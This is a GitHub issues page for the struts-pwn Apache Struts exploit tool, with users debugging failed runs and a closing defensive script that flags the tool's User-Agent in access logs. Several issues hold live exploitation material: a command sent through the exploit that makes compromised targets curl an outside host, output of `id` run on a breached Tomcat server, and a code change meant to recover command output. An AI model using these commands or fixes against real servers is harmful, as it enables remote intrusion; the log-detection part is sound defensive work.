
struts-pwn's Issues

passing url to the command var

Hey dude,

When doing a list, is there any way to provide the URL as a var in the command so you can log which sites are vulnerable?

python struts-pwn.py --list 'urls.txt' -c 'curl -L https://mysite.com/test.php?url='

Issue with requests partial read

Urls have been obfuscated. On a vulnerable struts server, using the default struts-pwn, an IncompleteRead is returned with 0 bytes

root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: xxxx/test.action
[*] CMD: id
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
ERROR
[%] Done.

If this is swapped to be urllib2 however, a partial response is received:

    try:
        #rq = requests.get(url, headers=headers, timeout=timeout, allow_redirects=False)
        #output = rq.text
        # urllib2 replaces requests here; `import urllib2` is needed at the top of the script
        request = urllib2.Request(url, headers=headers)
        # the original assigned the body back to `request`, so `output` was never set on success
        output = urllib2.urlopen(request).read()
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        # IncompleteRead carries the bytes received before the connection dropped;
        # other exception types have no .partial attribute
        print(getattr(e, 'partial', ''))
        output = 'ERROR'
    return output
root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: http://xxxx/test.action
[*] CMD: id
EXCEPTION::::--> IncompleteRead(54 bytes read)
uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

ERROR
[%] Done.

I've yet to identify what behind the scenes is causing this error. Urllib3 appears to have the same behaviour as urllib2 (although I can't work out how to decode the response). Any idea if the way requests is working is causing issues?

ssl problem

The exploit code failed against HTTPS websites.

error 104 - Connection reset by peer

Strangely enough, if I run the python script with --check, I get a response 200 and it shows my site as vulnerable.

If I try to run the exploit, then I get an Exception:
EXCEPTION::::--> ('Connection aborted.', error(104, 'Connection reset by peer'))

Any ideas what I can do to debug where/why the exception is being generated with the exploitable content-type?

Script Kiddies in log

Seeing this in my logs from a Script Kiddie.

80.15.195.28 - - [30/Apr/2017:10:34:21 +0000] "GET / HTTP/1.1" 200 0 "-" "struts-pwn (https://github.com/mazen160/struts-pwn)"
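The log line above is in the standard Apache/nginx "combined" format, and the tool announces itself in the User-Agent header. The following is an added example, not code from the struts-pwn project or from the issue author, that parses combined-format access log lines and flags requests carrying that User-Agent so they can be counted per source address. Only the first sample line is the one quoted in the issue; the other two are constructed benign traffic for contrast, and the IP addresses in them are documentation ranges.

```python
import re
from typing import List, NamedTuple, Optional

# Constructed sample log in Apache/nginx "combined" format. The first line
# reproduces the one quoted in the issue; the other two are invented.
SAMPLE_LOG = """\
80.15.195.28 - - [30/Apr/2017:10:34:21 +0000] "GET / HTTP/1.1" 200 0 "-" "struts-pwn (https://github.com/mazen160/struts-pwn)"
203.0.113.7 - - [30/Apr/2017:10:35:02 +0000] "GET /index.action HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.4 - - [30/Apr/2017:10:36:10 +0000] "POST /upload.action HTTP/1.1" 500 0 "-" "python-requests/2.18.4"
"""

# Apache "combined" log format:
# host ident authuser [timestamp] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markers taken from the User-Agent string shown in the issue. A scanner can
# change its User-Agent, so this is a cheap indicator, not proof of absence.
SCANNER_UA_MARKERS = ("struts-pwn", "github.com/mazen160/struts-pwn")


class Hit(NamedTuple):
    ip: str
    timestamp: str
    method: str
    path: str
    status: int
    user_agent: str


def parse_combined(line: str) -> Optional[dict]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_struts_pwn(user_agent: str) -> bool:
    """True if the User-Agent contains any of the known scanner markers (case-insensitive)."""
    ua = user_agent.lower()
    return any(marker in ua for marker in SCANNER_UA_MARKERS)


def find_struts_pwn_hits(log_text: str) -> List[Hit]:
    """Scan a whole log body and return the requests that match the scanner User-Agent."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_combined(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash the sweep
        if is_struts_pwn(rec["ua"]):
            hits.append(Hit(rec["ip"], rec["ts"], rec["method"], rec["path"],
                            int(rec["status"]), rec["ua"]))
    return hits


def count_by_ip(hits: List[Hit]) -> dict:
    """Aggregate hits per source address, the usual shape for a blocklist or alert."""
    counts: dict = {}
    for h in hits:
        counts[h.ip] = counts.get(h.ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = find_struts_pwn_hits(SAMPLE_LOG)
    for h in found:
        print(f"{h.timestamp} {h.ip} {h.method} {h.path} -> {h.status} UA={h.user_agent!r}")
    print(count_by_ip(found))
```

Run it against an exported access log (`python detect.py < access.log` after swapping `SAMPLE_LOG` for `sys.stdin.read()`) to get the per-IP tally. Because the scanner only reveals itself through a header it fully controls, treat a match as a reason to look at that host's other requests and at the application's own error logs, not as the complete picture.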